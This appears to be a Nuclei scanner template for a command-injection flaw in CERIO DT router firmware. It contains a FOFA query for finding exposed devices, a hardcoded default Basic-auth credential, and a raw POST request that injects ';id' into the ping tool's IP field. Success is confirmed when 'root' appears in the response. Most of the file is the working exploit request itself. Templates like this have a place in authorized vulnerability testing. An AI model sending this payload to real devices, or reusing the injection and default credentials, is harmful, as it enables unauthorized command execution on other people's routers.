id: CERIODT
 
info:
  name: CERIO DT命令执行
  author: someone
  severity: high
  metadata: 
    fofa-query: title="DT-100G-N" || title="DT-300N" || title="DT-100G" || title="AMR-3204G" || title="WMR-200N"

http:
  - raw:
      - |
        POST /cgi-bin/Save.cgi?cgi=PING HTTP/1.1
        Host: {{Hostname}}
        Authorization: Basic b3BlcmF0b3I6MTIzNA==
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
        Content-Length: 33

        pid=2061&ip=127.0.0.1;id&times=1
   
    matchers:
      - type: dsl
        dsl:
          - status_code==200 && contains_all(body,"root")